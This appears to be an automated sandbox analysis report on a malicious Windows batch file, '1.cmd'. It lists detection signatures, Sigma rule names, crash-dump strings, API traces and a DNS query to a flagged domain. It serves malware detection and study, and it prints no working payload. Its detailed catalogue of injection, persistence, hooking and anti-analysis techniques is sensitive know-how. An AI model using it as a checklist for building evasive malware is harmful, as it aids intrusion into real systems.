Windows Analysis Report
1.cmd

Overview

General Information

Sample name: 1.cmd
Analysis ID: 1525388
MD5: 19fc666f7494d78a55d6b50a0252c214
SHA1: 8876cd520507cbfdc2e89e449baba52232a1df1b
SHA256: e96f8f61e3af77c429ae6af54c128f7b8420a45a0a63bdfcacd682773b8e5fc1
Infos:

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
.NET source code contains process injector
.NET source code references suspicious native API functions
AI detected suspicious sample
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Creates an autostart registry key pointing to binary in C:\Windows
Creates autostart registry keys with suspicious names
Creates autostart registry keys with suspicious values (likely registry only malware)
Found suspicious powershell code related to unpacking or dynamic code loading
Hides that the sample has been downloaded from the Internet (zone.identifier)
Hides threads from debuggers
Hooks files or directories query functions (used to hide files and directories)
Hooks processes query functions (used to hide processes)
Hooks registry keys query functions (used to hide registry keys)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Installs a global keyboard hook
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Obfuscated command line found
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Sets debug register (to hijack the execution of another thread)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential WinAPI Calls Via CommandLine
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Powerup Write Hijack DLL
Suspicious command line found
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Deletes files inside the Windows folder
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Powershell Execute Batch Script
Sigma detected: Suspicious Powershell In Registry Run Keys
Sigma detected: Uncommon Svchost Parent Process
Stores large binary data to the registry
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

AV Detection
barindex
Multi AV Scanner detection for domain / URL
Source: azure-winsecure.com Virustotal: Detection: 8% Perma Link
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 98.0% probability
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00401000 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext, 34_2_00401000
Source: Binary string: System.Configuration.Install.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Data.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Core.pdbSystem.Transactions.ni.dlliy source: WER643A.tmp.dmp.27.dr
Source: Binary string: System.pdbMZ@ source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Numerics.pdbp source: WER8767.tmp.dmp.10.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000030.00000002.2993093539.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Xml.pdbp source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Windows.Forms.ni.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Drawing.ni.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: Microsoft.Powershell.PSReadline.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.DirectoryServices.ni.pdbRSDS source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\wct3D66.tmp.pdb source: svchost.exe, 00000030.00000002.2998382986.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2531371403.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Drawing.ni.pdbRSDS source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000030.00000002.2993093539.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2531084771.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000030.00000002.2998382986.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2531371403.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Configuration.Install.ni.pdbRSDSQ source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Xml.ni.pdbRSDS# source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: Microsoft.PowerShell.Security.pdbP source: WER643A.tmp.dmp.27.dr
Source: Binary string: System.Core.ni.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000030.00000002.2998382986.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2531371403.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Numerics.ni.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000030.00000002.2993093539.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2531084771.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.DirectoryServices.ni.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Drawing.pdb0 source: WER8767.tmp.dmp.10.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000030.00000002.2995887464.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2531273543.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.ServiceProcess.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Configuration.Install.pdb }b source: WER8767.tmp.dmp.10.dr
Source: Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdbRSDS[q source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: mscorlib.ni.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000030.00000002.2998382986.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2531371403.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: WINLOA~1.PDB source: svchost.exe, 00000030.00000002.2995887464.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2531273543.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.ServiceProcess.ni.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Configuration.Install.ni.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: mscorlib.pdb:\W source: WER8767.tmp.dmp.10.dr
Source: Binary string: Microsoft.Management.Infrastructure.ni.pdbRSDS source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000030.00000002.2998382986.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2531371403.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdbRSDS source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000030.00000002.2998382986.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2531371403.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\wctAB5F.tmp.pdb source: svchost.exe, 00000030.00000002.2995887464.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2531273543.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Security.ni.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Xml.ni.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: Microsoft.PowerShell.Security.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.ni.pdbRSDS source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.DirectoryServices.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: Microsoft.CSharp.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Management.pdbP4 source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Configuration.ni.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Configuration.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Data.ni.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Data.ni.pdbRSDSC source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Windows.Forms.pdb` source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Xml.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: Microsoft.PowerShell.ConsoleHost.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000030.00000002.2993093539.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2531084771.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\wmsetup.log.pdb source: svchost.exe, 00000030.00000002.2995887464.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2531273543.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.ni.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Numerics.ni.pdbRSDSautg source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Management.Automation.ni.pdbRSDS source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Data.pdbH source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.ServiceProcess.ni.pdbRSDSwg source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Windows.Forms.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Management.Automation.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000030.00000002.2995887464.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2531273543.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: Microsoft.PowerShell.Security.ni.pdbRSDS~ source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Management.Automation.pdb3 source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Management.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Drawing.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2.pdbr source: svchost.exe, 00000030.00000002.2995887464.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2531273543.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: Microsoft.Management.Infrastructure.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Management.ni.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Core.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Transactions.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Configuration.Install.pdbh source: WER643A.tmp.dmp.27.dr
Source: Binary string: System.Core.pdbiy source: WER8767.tmp.dmp.10.dr
Source: Binary string: Microsoft.Management.Infrastructure.ni.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdbP source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Transactions.ni.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000030.00000002.2993093539.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2531084771.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: Microsoft.Powershell.PSReadline.pdb N source: WER643A.tmp.dmp.27.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000030.00000002.2995887464.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2531273543.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb* source: svchost.exe, 00000030.00000002.2998382986.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2531371403.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Transactions.ni.pdbRSDS source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Numerics.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: Microsoft.CSharp.pdb@ source: WER643A.tmp.dmp.27.dr
Source: Binary string: System.ni.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Core.ni.pdbRSDS source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: C:\Windows\System32\cmd.exe Code function: 18_2_0000022123C2D894 FindFirstFileExW, 18_2_0000022123C2D894
Source: C:\Windows\System32\cmd.exe Code function: 18_2_0000022123C2DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 18_2_0000022123C2DA18
Source: C:\Windows\System32\cmd.exe Code function: 18_2_0000022123C5D894 FindFirstFileExW, 18_2_0000022123C5D894
Source: C:\Windows\System32\cmd.exe Code function: 18_2_0000022123C5DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 18_2_0000022123C5DA18
Source: C:\Windows\System32\conhost.exe Code function: 19_2_0000013F08E6DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 19_2_0000013F08E6DA18
Source: C:\Windows\System32\conhost.exe Code function: 19_2_0000013F08E6D894 FindFirstFileExW, 19_2_0000013F08E6D894
Source: C:\Windows\System32\conhost.exe Code function: 19_2_0000013F08E9DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 19_2_0000013F08E9DA18
Source: C:\Windows\System32\conhost.exe Code function: 19_2_0000013F08E9D894 FindFirstFileExW, 19_2_0000013F08E9D894
Source: C:\Windows\System32\conhost.exe Code function: 36_2_000001FD186DD894 FindFirstFileExW, 36_2_000001FD186DD894
Source: C:\Windows\System32\conhost.exe Code function: 36_2_000001FD186DDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 36_2_000001FD186DDA18
Source: C:\Windows\System32\dllhost.exe Code function: 37_2_0000017C6DABDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 37_2_0000017C6DABDA18
Source: C:\Windows\System32\dllhost.exe Code function: 37_2_0000017C6DABD894 FindFirstFileExW, 37_2_0000017C6DABD894
Source: C:\Windows\System32\dllhost.exe Code function: 37_2_0000017C6DD7DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 37_2_0000017C6DD7DA18
Source: C:\Windows\System32\dllhost.exe Code function: 37_2_0000017C6DD7D894 FindFirstFileExW, 37_2_0000017C6DD7D894
Source: C:\Windows\System32\winlogon.exe Code function: 38_2_00000225DC64DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 38_2_00000225DC64DA18
Source: C:\Windows\System32\winlogon.exe Code function: 38_2_00000225DC64D894 FindFirstFileExW, 38_2_00000225DC64D894
Source: C:\Windows\System32\winlogon.exe Code function: 38_2_00000225DC67DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 38_2_00000225DC67DA18
Source: C:\Windows\System32\winlogon.exe Code function: 38_2_00000225DC67D894 FindFirstFileExW, 38_2_00000225DC67D894
Source: C:\Windows\System32\lsass.exe Code function: 39_2_00000202C0AEDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 39_2_00000202C0AEDA18
Source: C:\Windows\System32\lsass.exe Code function: 39_2_00000202C0AED894 FindFirstFileExW, 39_2_00000202C0AED894
Source: C:\Windows\System32\lsass.exe Code function: 39_2_00000202C0B1DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 39_2_00000202C0B1DA18
Source: C:\Windows\System32\lsass.exe Code function: 39_2_00000202C0B1D894 FindFirstFileExW, 39_2_00000202C0B1D894
Source: C:\Windows\System32\svchost.exe Code function: 40_2_000002A66130DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 40_2_000002A66130DA18
Source: C:\Windows\System32\svchost.exe Code function: 40_2_000002A66130D894 FindFirstFileExW, 40_2_000002A66130D894
Source: C:\Windows\System32\dwm.exe Code function: 41_2_000002BAAEDCDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 41_2_000002BAAEDCDA18
Source: C:\Windows\System32\dwm.exe Code function: 41_2_000002BAAEDCD894 FindFirstFileExW, 41_2_000002BAAEDCD894
Source: C:\Windows\System32\dwm.exe Code function: 41_2_000002BAAEDFDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 41_2_000002BAAEDFDA18
Source: C:\Windows\System32\dwm.exe Code function: 41_2_000002BAAEDFD894 FindFirstFileExW, 41_2_000002BAAEDFD894
Source: C:\Windows\System32\wbem\WMIADAP.exe Code function: 42_2_000002705306DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 42_2_000002705306DA18
Source: C:\Windows\System32\wbem\WMIADAP.exe Code function: 42_2_000002705306D894 FindFirstFileExW, 42_2_000002705306D894
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic DNS traffic detected: DNS query: azure-winsecure.com
Source: Microsoft-Windows-LiveId%4Operational.evtx.49.dr String found in binary or memory: http://Passport.NET/tb
Source: lsass.exe, 00000027.00000000.2476237818.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3042577536.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3042577536.00000202C03A8000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: lsass.exe, 00000027.00000000.2476237818.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3042577536.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2475347733.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3021017119.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: lsass.exe, 00000027.00000002.3041073234.00000202C0379000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2476237818.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3042577536.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3042577536.00000202C03A8000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2476179547.00000202C0379000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
Source: powershell.exe, 00000007.00000002.2143087471.000001A697909000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2475973230.000002A7E1F25000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.microsoft
Source: lsass.exe, 00000027.00000000.2476237818.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3042577536.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3042577536.00000202C03A8000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: lsass.exe, 00000027.00000000.2476237818.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3042577536.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2475347733.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3021017119.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: lsass.exe, 00000027.00000002.3041073234.00000202C0379000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2476237818.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3042577536.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3042577536.00000202C03A8000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2476179547.00000202C0379000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
Source: lsass.exe, 00000027.00000000.2475625757.00000202C0249000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2476237818.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3042577536.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000003.2511424538.00000202C024E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3028177697.00000202C0249000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: lsass.exe, 00000027.00000000.2476237818.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3042577536.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3042577536.00000202C03A8000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: lsass.exe, 00000027.00000000.2476237818.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3042577536.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2475347733.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3021017119.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: lsass.exe, 00000027.00000002.3041073234.00000202C0379000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2476237818.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3042577536.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3042577536.00000202C03A8000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2476179547.00000202C0379000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
Source: lsass.exe, 00000027.00000000.2475347733.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3021017119.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: lsass.exe, 00000027.00000002.3028177697.00000202C0200000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2475625757.00000202C0200000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: lsass.exe, 00000027.00000002.3015267730.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2475151246.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702
Source: lsass.exe, 00000027.00000002.3016592946.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2475206356.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512
